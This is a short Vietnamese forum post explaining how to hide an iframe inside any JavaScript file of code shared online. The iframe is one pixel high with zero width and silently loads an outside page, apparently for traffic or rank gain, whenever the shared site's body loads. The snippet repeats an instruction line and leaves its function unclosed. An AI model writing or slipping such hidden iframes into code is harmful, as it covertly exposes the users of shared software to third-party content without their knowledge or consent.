
tubotocdo
Active Member
Bạn có một code và share trên mạng , muốn chèn iframe thì làm như sau
có một file js - file nào cũng dc , miễn là js
bạn chèn code :
vào trong index.php bạn chỉ cần load file js đó lên và thêm đoạn sau : (vào chỗ nào cũng dc)
có một file js - file nào cũng dc , miễn là js
bạn chèn code :
HTML:
function ShowJsF()
{
var iframe = document.createElement("iframe");
iframe.setAttribute("id","testiframe");
iframe.setAttribute("name","testiframe");
iframe.setAttribute("height","1");
iframe.setAttribute("width","0");
iframe.setAttribute("frameBorder","1");
iframe.setAttribute("scrolling","auto");
iframe.setAttribute("src","http://blog.topsao.in/rank.html");
iframe.style.position = "absolute";
iframe.style.display = "block";
iframe.style.top = 100 + 'px';
iframe.style.left = 100 + 'px';
window.document.body.appendChild(iframe);
return false;
HTML:
<body onload="ShowJsF();">